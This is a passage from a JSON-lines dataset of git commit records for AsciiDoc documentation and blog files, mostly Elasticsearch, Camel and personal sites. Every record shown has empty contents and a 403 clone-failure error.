lasticsearch,kkirsche\/elasticsearch,jbertouch\/elasticsearch,henakamaMSFT\/elasticsearch,hydro2k\/elasticsearch,sjohnr\/elasticsearch,NBSW\/elasticsearch,elancom\/elasticsearch,sarwarbhuiyan\/elasticsearch,JackyMai\/elasticsearch,Charlesdong\/elasticsearch,pranavraman\/elasticsearch,a2lin\/elasticsearch,abibell\/elasticsearch,ouyangkongtong\/elasticsearch,JackyMai\/elasticsearch,markwalkom\/elasticsearch,tkssharma\/elasticsearch,glefloch\/elasticsearch,mikemccand\/elasticsearch,tebriel\/elasticsearch,rajanm\/elasticsearch,girirajsharma\/elasticsearch,MichaelLiZhou\/elasticsearch,onegambler\/elasticsearch,yynil\/elasticsearch,AshishThakur\/elasticsearch,qwerty4030\/elasticsearch,javachengwc\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,hanswang\/elasticsearch,Charlesdong\/elasticsearch,jsgao0\/elasticsearch,strapdata\/elassandra5-rc,sc0ttkclark\/elasticsearch,PhaedrusTheGreek\/elasticsearch,iamjakob\/elasticsearch,mm0\/elasticsearch,F0lha\/elasticsearch,kkirsche\/elasticsearch,kalburgimanjunath\/elasticsearch,HonzaKral\/elasticsearch,wittyameta\/elasticsearch,alexshadow007\/elasticsearch,masterweb121\/elasticsearch,cwurm\/elasticsearch,Shekharrajak\/elasticsearch,khiraiwa\/elasticsearch,vvcephei\/elasticsearch,iantruslove\/elasticsearch,MjAbuz\/elasticsearch,elancom\/elasticsearch,hafkensite\/elasticsearch,sreeramjayan\/elasticsearch,s1monw\/elasticsearch,sposam\/elasticsearch,markllama\/elasticsearch,lydonchandra\/elasticsearch,wittyameta\/elasticsearch,awislowski\/elasticsearch,mohit\/elasticsearch,martinstuga\/elasticsearch,kingaj\/elasticsearch,fred84\/elasticsearch,Stacey-Gammon\/elasticsearch,jango2015\/elasticsearch,mikemccand\/elasticsearch,MisterAndersen\/elasticsearch,YosuaMichael\/elasticsearch,PhaedrusTheGreek\/elasticsearch,petabytedata\/elasticsearch,rlugojr\/elasticsearch,dataduke\/elasticsearch,palecur\/elasticsearch,milodky\/elasticsearch,acchen97\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,lchennup\/elasticsearch,YosuaMichael\/elasticsearch,alexbrasetvik\/elasticsearch,mapr\/elasticsearch,jimhooker2002\/elasticsearch,aglne\/elasticsearch,mcku\/elasticsearch,HarishAtGitHub\/elasticsearch,MetSystem\/elasticsearch,szroland\/elasticsearch,camilojd\/elasticsearch,wuranbo\/elasticsearch,iamjakob\/elasticsearch,thecocce\/elasticsearch,Uiho\/elasticsearch,ydsakyclguozi\/elasticsearch,caengcjd\/elasticsearch,HonzaKral\/elasticsearch,codebunt\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,ouyangkongtong\/elasticsearch,Shepard1212\/elasticsearch,golubev\/elasticsearch,kunallimaye\/elasticsearch,adrianbk\/elasticsearch,pritishppai\/elasticsearch,likaiwalkman\/elasticsearch,markharwood\/elasticsearch,MisterAndersen\/elasticsearch,fernandozhu\/elasticsearch,xpandan\/elasticsearch,himanshuag\/elasticsearch,trangvh\/elasticsearch,Liziyao\/elasticsearch,hechunwen\/elasticsearch,masterweb121\/elasticsearch,szroland\/elasticsearch,codebunt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,sjohnr\/elasticsearch,tkssharma\/elasticsearch,ulkas\/elasticsearch,brandonkearby\/elasticsearch,zeroctu\/elasticsearch,mapr\/elasticsearch,abibell\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,markharwood\/elasticsearch,thecocce\/elasticsearch,kcompher\/elasticsearch,humandb\/elasticsearch,ImpressTV\/elasticsearch,jpountz\/elasticsearch,coding0011\/elasticsearch,mnylen\/elasticsearch,18098924759\/elasticsearch,snikch\/elasticsearch,achow\/elasticsearch,btiernay\/elasticsearch,nazarewk\/elasticsearch,wimvds\/elasticsearch,caengcjd\/elasticsearch,AndreKR\/elasticsearch,Fsero\/elasticsearch,trangvh\/elasticsearch,golubev\/elasticsearch,zhiqinghuang\/elasticsearch,obourgain\/elasticsearch,sauravmondallive\/elasticsearch,nazarewk\/elasticsearch,Collaborne\/elasticsearch,lzo\/elasticsearch-1,mbrukman\/elasticsearch,schonfeld\/elasticsearch,strapdata\/elassandra-test,Fsero\/elasticsearch,kaneshin\/elasticsearch,a2lin\/elasticsearch,mute\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kenshin233\/elasticsearch,sreeramjayan\/elasticsearch,tahaemin\/elasticsearch,lightslife\/elasticsearch,humandb\/elasticsearch,kevinkluge\/elasticsearch,ouyangkongtong\/elasticsearch,wbowling\/elasticsearch,szroland\/elasticsearch,kenshin233\/elasticsearch,sposam\/elasticsearch,vvcephei\/elasticsearch,SergVro\/elasticsearch,iamjakob\/elasticsearch,mute\/elasticsearch,sauravmondallive\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,javachengwc\/elasticsearch,kcompher\/elasticsearch,tkssharma\/elasticsearch,humandb\/elasticsearch,vingupta3\/elasticsearch,avikurapati\/elasticsearch,LewayneNaidoo\/elasticsearch,MjAbuz\/elasticsearch,khiraiwa\/elasticsearch,JackyMai\/elasticsearch,Asimov4\/elasticsearch,Liziyao\/elasticsearch,AndreKR\/elasticsearch,Widen\/elasticsearch,zkidkid\/elasticsearch,i-am-Nathan\/elasticsearch,HarishAtGitHub\/elasticsearch,TonyChai24\/ESSource,18098924759\/elasticsearch,shreejay\/elasticsearch,EasonYi\/elasticsearch,kunallimaye\/elasticsearch,SergVro\/elasticsearch,karthikjaps\/elasticsearch,zhiqinghuang\/elasticsearch,achow\/elasticsearch,pritishppai\/elasticsearch,khiraiwa\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,vrkansagara\/elasticsearch,Kakakakakku\/elasticsearch,wayeast\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,aglne\/elasticsearch,pritishppai\/elasticsearch,gmarz\/elasticsearch,nellicus\/elasticsearch,caengcjd\/elasticsearch,vrkansagara\/elasticsearch,rmuir\/elasticsearch,kkirsche\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ImpressTV\/elasticsearch,Kakakakakku\/elasticsearch,wenpos\/elasticsearch,jeteve\/elasticsearch,jimczi\/elasticsearch,alexbrasetvik\/elasticsearch,NBSW\/elasticsearch,phani546\/elasticsearch,areek\/elasticsearch,Brijeshrpatel9\/elasticsearch,huanzhong\/elasticsearch,ydsakyclguozi\/elasticsearch,wittyameta\/elasticsearch,acchen97\/elasticsearch,episerver\/elasticsearch,ImpressTV\/elasticsearch,himanshuag\/elasticsearch,kimimj\/elasticsearch,hanswang\/elasticsearch,Siddartha07\/elasticsearch,infusionsoft\/elasticsearch,i-am-Nathan\/elasticsearch,kingaj\/elasticsearch,wenpos\/elasticsearch,koxa29\/elasticsearch,KimTaehee\/elasticsearch,kingaj\/elasticsearch,davidvgalbraith\/elasticsearch,alexshadow007\/elasticsearch,MjAbuz\/elasticsearch,vietlq\/elasticsearch,Charlesdong\/elasticsearch,jchampion\/elasticsearch,golubev\/elasticsearch,markllama\/elasticsearch,Asimov4\/elasticsearch,onegambler\/elasticsearch,wenpos\/elasticsearch,cnfire\/elasticsearch-1,jsgao0\/elasticsearch,truemped\/elasticsearch,Kakakakakku\/elasticsearch,markllama\/elasticsearch,petabytedata\/elasticsearch,markllama\/elasticsearch,tsohil\/elasticsearch,khiraiwa\/elasticsearch,Microsoft\/elasticsearch,dongjoon-hyun\/elasticsearch,EasonYi\/elasticsearch,queirozfcom\/elasticsearch,Chhunlong\/elasticsearch,beiske\/elasticsearch,jchampion\/elasticsearch,wayeast\/elasticsearch,scorpionvicky\/elasticsearch,pablocastro\/elasticsearch,infusionsoft\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,sdauletau\/elasticsearch,ckclark\/elasticsearch,iantruslove\/elasticsearch,koxa29\/elasticsearch,lmtwga\/elasticsearch,lzo\/elasticsearch-1,anti-social\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,mnylen\/elasticsearch,ThalaivaStars\/OrgRepo1,zeroctu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mrorii\/elasticsearch,karthikjaps\/elasticsearch,cwurm\/elasticsearch,yynil\/elasticsearch,humandb\/elasticsearch,camilojd\/elasticsearch,ulkas\/elasticsearch,geidies\/elasticsearch,StefanGor\/elasticsearch,jpountz\/elasticsearch,golubev\/elasticsearch,knight1128\/elasticsearch,nazarewk\/elasticsearch,amaliujia\/elasticsearch,davidvgalbraith\/elasticsearch,Flipkart\/elasticsearch,dylan8902\/elasticsearch,andrestc\/elasticsearch,chirilo\/elasticsearch,apepper\/elasticsearch,brandonkearby\/elasticsearch,kaneshin\/elasticsearch,uschindler\/elasticsearch,wimvds\/elasticsearch,coding0011\/elasticsearch,truemped\/elasticsearch,Collaborne\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,nellicus\/elasticsearch,socialrank\/elasticsearch,springning\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,Flipkart\/elasticsearch,mute\/elasticsearch,feiqitian\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,lightslife\/elasticsearch,hechunwen\/elasticsearch,Rygbee\/elasticsearch,kimimj\/elasticsearch,pranavraman\/elasticsearch,gmarz\/elasticsearch,springning\/elasticsearch,ImpressTV\/elasticsearch,hirdesh2008\/elasticsearch,mbrukman\/elasticsearch,zhiqinghuang\/elasticsearch,diendt\/elasticsearch,andrejserafim\/elasticsearch,Widen\/elasticsearch,iacdingping\/elasticsearch,mbrukman\/elasticsearch,scottsom\/elasticsearch,weipinghe\/elasticsearch,hafkensite\/elasticsearch,coding0011\/elasticsearch,alexshadow007\/elasticsearch,clintongormley\/elasticsearch,geidies\/elasticsearch,kubum\/elasticsearch,pranavraman\/elasticsearch,Kakakakakku\/elasticsearch,njlawton\/elasticsearch,mkis-\/elasticsearch,bestwpw\/elasticsearch,geidies\/elasticsearch,masterweb121\/elasticsearch,Clairebi\/ElasticsearchClone,karthikjaps\/elasticsearch,Uiho\/elasticsearch,sjohnr\/elasticsearch,fforbeck\/elasticsearch,alexkuk\/elasticsearch,StefanGor\/elasticsearch,Widen\/elasticsearch,palecur\/elasticsearch,mjason3\/elasticsearch,lchennup\/elasticsearch,ouyangkongtong\/elasticsearch,ckclark\/elasticsearch,smflorentino\/elasticsearch,yongminxia\/elasticsearch,polyfractal\/elasticsearch,milodky\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,jeteve\/elasticsearch,tebriel\/elasticsearch,naveenhooda2000\/elasticsearch,Clairebi\/ElasticsearchClone,baishuo\/elasticsearch_v2.1.0-baishuo,Chhunlong\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,hanswang\/elasticsearch,Collaborne\/elasticsearch,drewr\/elasticsearch,hanswang\/elasticsearch,awislowski\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,jango2015\/elasticsearch,ivansun1010\/elasticsearch,feiqitian\/elasticsearch,springning\/elasticsearch,vroyer\/elassandra,onegambler\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,artnowo\/elasticsearch,alexbrasetvik\/elasticsearch,kalburgimanjunath\/elasticsearch","old_file":"docs\/reference\/analysis\/analyzers\/standard-analyzer.asciidoc","new_file":"docs\/reference\/analysis\/analyzers\/standard-analyzer.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"580775423a8d6f9951e7633450f35dda4686de7f","subject":"Retroactive post about Hawkular Metrics 0.6.0 release.","message":"Retroactive post about Hawkular Metrics 0.6.0 release.\n","repos":"jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/29\/hawkular-metrics-0.6.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/29\/hawkular-metrics-0.6.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c824c18bc0e423e5b55d227327d804c9a9e52194","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51753eb4ca2d2717a2bb58b2e0462db7f727ee41","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39dfa5fe7363cd1729e7a9e1e19401b498bb7784","subject":"Migrating old release notes: 2.17.1 release notes","message":"Migrating old release notes: 2.17.1 release notes\n","repos":"sverkera\/camel,cunningt\/camel,apache\/camel,ullgren\/camel,pax95\/camel,tdiesler\/camel,sverkera\/camel,pax95\/camel,anoordover\/camel,sverkera\/camel,kevinearls\/camel,davidkarlsen\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,zregvart\/camel,objectiser\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,onders86\/camel,kevinearls\/camel,alvinkwekel\/camel,kevinearls\/camel,nikhilvibhav\/camel,DariusX\/camel,gnodet\/camel,alvinkwekel\/camel,christophd\/camel,onders86\/camel,DariusX\/camel,cunningt\/camel,gnodet\/camel,ullgren\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,davidkarlsen\/camel,sverkera\/camel,alvinkwekel\/camel,adessaigne\/camel,anoordover\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,pmoerenhout\/camel,mcollovati\/camel,tdiesler\/camel,nicolaferraro\/camel,pmoerenhout\/camel,CodeSmell\/camel,cunningt\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,pax95\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,tadayosi\/camel,jamesnetherton\/camel,sverkera\/camel,adessaigne\/camel,apache\/camel,ullgren\/camel,Fabryprog\/camel,jamesnetherton\/camel,kevinearls\/camel,Fabryprog\/camel,jamesnetherton\/camel,tadayosi\/camel,mcollovati\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,objectiser\/camel,mcollovati\/camel,adessaigne\/camel,anoordover\/camel,zregvart\/camel,pax95\/camel,zregvart\/camel,davidkarlsen\/camel,cunningt\/camel,cunningt\/camel,jamesnetherton\/camel,tadayosi\/camel,anoordover\/camel,pax95\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,pmoerenhout\/camel,onders86\/camel,anoordover\/camel,adessaigne\/camel,Fabryprog\/camel,christophd\/camel,zregvart\/camel,objectiser\/camel,onders86\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,apache\/camel,apache\/camel,CodeSmell\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,DariusX\/camel,anoordover\/camel,pmoerenhout\/camel,tdiesler\/camel,jamesnetherton\/camel,apache\/camel,onders86\/camel,punkhorn\/camel-upstream,gnodet\/camel,kevinearls\/camel,CodeSmell\/camel,sverkera\/camel,apache\/camel,punkhorn\/camel-upstream,adessaigne\/camel,mcollovati\/camel,gnodet\/camel,tdiesler\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,pmoerenhout\/camel,alvinkwekel\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2171-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2171-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bc74cb3d90bbd418c9d85ae3556f64704d8c47d","subject":"Add documentation for compression support.","message":"Add documentation for compression support.\n","repos":"GetAmbassador\/django-redis,lucius-feng\/django-redis,zl352773277\/django-redis,smahs\/django-redis,yanheng\/django-redis","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yanheng\/django-redis.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"eda682d22b47144448b716c3e5bf4ebb7baa009a","subject":"Add first draft of EDA API documentation","message":"Add first draft of EDA API documentation\n","repos":"olofk\/fusesoc,lowRISC\/fusesoc,olofk\/fusesoc,lowRISC\/fusesoc","old_file":"doc\/eda_api.adoc","new_file":"doc\/eda_api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olofk\/fusesoc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f62b01cdf08c65c572eef47c010ca6975d30d97e","subject":"y2b create post Did Apple Just Cancel The iPhone X?","message":"y2b create post Did Apple Just Cancel The iPhone X?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-24-Did-Apple-Just-Cancel-The-iPhone-X.adoc","new_file":"_posts\/2018-01-24-Did-Apple-Just-Cancel-The-iPhone-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54475bcb7b57db41147bb84626e0e06cd1cfb05f","subject":"Update 2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","message":"Update 2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","new_file":"_posts\/2016-01-16-APIs-and-why-Tech-Writers-need-to-know-about-them.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92d741a832d49d64cdcedcce22f007fcbf967828","subject":"Update 2019-11-23-oyl.adoc","message":"Update 2019-11-23-oyl.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-oyl.adoc","new_file":"_posts\/2019-11-23-oyl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b3ae419c2813190d3622d067c59519d71156e42","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cd134a0d70d34fdf0347634c2bf80716eaf3515","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c383d7c67fdc4a3559244e092b9111e3039a1545","subject":"First Pass at ONCALL Template","message":"First Pass at ONCALL Template\n","repos":"lookout\/styleguides","old_file":"docs\/ONCALL.adoc","new_file":"docs\/ONCALL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lookout\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2881d58d2bd7a2c891f6dccf41754e343f40d34c","subject":"Update doc sections. Add model initial doc","message":"Update doc sections. Add model initial doc\n","repos":"mulesoft\/mule-cookbook","old_file":"model\/README.adoc","new_file":"model\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mulesoft\/mule-cookbook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e79872c3988be6bb5c1efcc4671167868d292943","subject":"y2b create post Beats By Dr Dre Beats Studio Unboxing - Blue (Colors)","message":"y2b create post Beats By Dr Dre Beats Studio Unboxing - Blue (Colors)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-31-Beats-By-Dr-Dre-Beats-Studio-Unboxing--Blue-Colors.adoc","new_file":"_posts\/2011-10-31-Beats-By-Dr-Dre-Beats-Studio-Unboxing--Blue-Colors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f921a471748cfb73f9c62b1855f63973c4e8e5","subject":"Update 2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","message":"Update 2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","new_file":"_posts\/2017-04-21-Creating-a-new-project-nativescript-with-angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf5a9afe0a027615c3dc77426ebadb592080aa3b","subject":"Update 2013-11-11-to-delete.adoc","message":"Update 2013-11-11-to-delete.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-to-delete.adoc","new_file":"_posts\/2013-11-11-to-delete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63ea64339bc08772acfe9f4e748b107a23447b6c","subject":"201801221857","message":"201801221857\n","repos":"bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house","old_file":"fiddles\/aws\/readme.adoc","new_file":"fiddles\/aws\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bradyhouse\/house.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c14f9aaf50c3e59826b56ac55f5524dd4218a64","subject":"job: #11931 Introducing analysis note for ASL types import and export.","message":"job: #11931 Introducing analysis note for ASL types import and export.\n","repos":"lwriemen\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,lwriemen\/mc,leviathan747\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc","old_file":"doc\/notes\/11444_wasl\/11931_types_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11931_types_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd2375a7556a959352ba06ba548d2cde11043c4b","subject":"Update 2017-05-28-Network-construction.adoc","message":"Update 2017-05-28-Network-construction.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-28-Network-construction.adoc","new_file":"_posts\/2017-05-28-Network-construction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90a843fdbb84a53c3afb59db5e1beb2a69dbe703","subject":"Fixed errors","message":"Fixed errors\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11b57b574565af1077fb842508303ca1e501666d","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d37f0bd8c7ee5d48b3d50709d8b18fa184e07a8","subject":"Create chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","message":"Create chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","new_file":"chapta_deeper_chaptadeeper_chapta2__deeper_chapta3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"88a89cc311825802f0f3b809be32db8511c4c44a","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 